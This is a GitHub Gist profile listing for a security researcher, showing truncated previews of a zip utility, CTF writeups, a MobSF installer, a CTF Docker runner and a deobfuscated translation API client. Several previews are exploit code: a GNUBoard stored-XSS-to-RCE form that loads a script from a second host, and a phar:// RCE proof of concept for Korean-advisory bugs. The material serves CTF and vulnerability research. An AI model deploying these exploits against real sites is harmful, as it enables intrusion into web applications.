Skip to content

Instantly share code, notes, and snippets.

View stypr's full-sized avatar
๐Ÿ†Ž**********************************
Be Lazy~

stypr

๐Ÿ†Ž**********************************
Be Lazy~
567 followers · 126 following
View GitHub Profile
@stypr
stypr / unzip_different_encoding.py
Created March 17, 2020 04:53
Unzip with different encoding
#!/usr/bin/python
#Nothing on stackoverflow works!
import zipfile
import sys
zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
_file.filename = bytes(_file.filename).decode('cp949')
@stypr
stypr / exploit.html
Last active February 6, 2021 15:11
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
@stypr
stypr / papago-api.php
Last active December 30, 2020 17:29
Deobfuscated Papago API (Python/Javascript/PHP) : Blocked as of December 2020
<?php
// Ported from papago.py
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
function uuidgen() {
return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
mt_rand(0, 0xffffffff),
mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)
@stypr
stypr / README.md
Last active February 9, 2020 07:01
CodeGate 2019 CSP challenge writeup

Solution

  1. if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)

  2. Use custom header and body to trigger CSP bypass.

@stypr
stypr / README.md
Last active September 18, 2019 09:56
2019 Cyber Operations Challenge Finals Pistol Exploit

Quick Summary

First-blooded this challenge. The server is down, I cannot explain briefly

  1. Comment in the website shows get_perm.php

  2. Another comment in the get_perm.php shows ?remote_debug=1.

  3. Using a php trick, you get a write post privilege.

@stypr
stypr / install.sh
Created August 16, 2019 09:05
Install MobSF Framework on CentOS 7 (with Headless Dynamic Analysis)
#!/bin/bash
# Maintainer: Harold Kim ([email protected])
# Tested in CentOS 7.6.1810
# $ lsb_release -a
# LSB Version: :core-4.1-amd64:core-4.1-noarch
# Distributor ID: CentOS
# Description: CentOS Linux release 7.6.1810 (Core)
# Release: 7.6.1810
# Codename: Core
@stypr
stypr / composer.py
Last active August 17, 2019 19:45
Docker runner for CTF
#!/usr/bin/python
#-*- coding:utf-8 -*-
# Developer: Harold Kim ([email protected])
import os
import sys
import time
import urllib
import urllib2
@stypr
stypr / a-z.md
Last active July 22, 2023 12:35
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@stypr
stypr / exploit.py
Last active August 17, 2019 19:28
CodeGate 2019: Rich Project exploit
import os
import urllib2
import urllib
import random
import sys
import time
import hashlib
def rand(sz=4):
return str(random.randint(10**sz, 100**sz))
@stypr
stypr / attack_script.js
Last active August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
// ์—…๋กœ๋“œํ•œ ํŒŒ์ผ์˜ ํŽ˜์ด๋กœ๋“œ.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// ๋จผ์ € ๊ณต๊ฒฉ์— ์•ž์„œ, ํ•ด๋‹น ๊ธฐ๋Šฅ์„ ์ง€์›ํ•˜๋Š” ๊ด€๋ฆฌ์ž์ธ์ง€ ํ™•์ธํ•œ๋‹ค.
$.get(`../qa_config.php`, function(d){
// ์ˆ˜์ •ํ•  ๊ณณ์€ โ€ํŒŒ์ผ ๊ฒฝ๋กœโ€œ ๊ฐ€ ๋“ค์–ด๊ฐ„ ๊ณณ์ด๋ฏ€๋กœ, ์ด ๋ถ€๋ถ„๋งŒ ์šฐ์„  ํ™•์ธํ•œ๋‹ค.
if(d.indexOf(`์ƒ๋‹จ ํŒŒ์ผ ๊ฒฝ๋กœ`) !== false){